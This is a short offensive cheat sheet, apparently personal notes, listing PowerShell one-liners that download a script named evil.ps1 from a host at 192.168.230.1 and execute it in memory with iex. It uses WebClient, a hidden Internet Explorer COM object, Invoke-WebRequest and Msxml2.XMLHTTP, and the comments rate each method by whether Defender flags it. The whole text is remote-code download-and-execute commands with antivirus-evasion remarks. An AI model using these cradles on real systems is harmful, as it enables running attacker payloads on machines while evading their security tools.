PowerShell Script Execution
iex (New-Object Net.WebClient).DownloadString('http://192.168.230.1/evil.ps1')
# try un use it - because it flag in defender$ie = New-Object -ComObject InternetExplorer.Application
$ie.visible=$False
$ie.navigate('http://192.168.230.1/evil.ps1')
sleep 5
$response=$ie.Document.body.innerHTML
$ie.quit()
iex $response
############### may goodiex (iwr 'http://192.168.230.1/evil.ps1')
# don't use it$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://192.168.230.1/evil.ps1',$false)
$h.send()
iex $h.responseText
#####3 stealthy way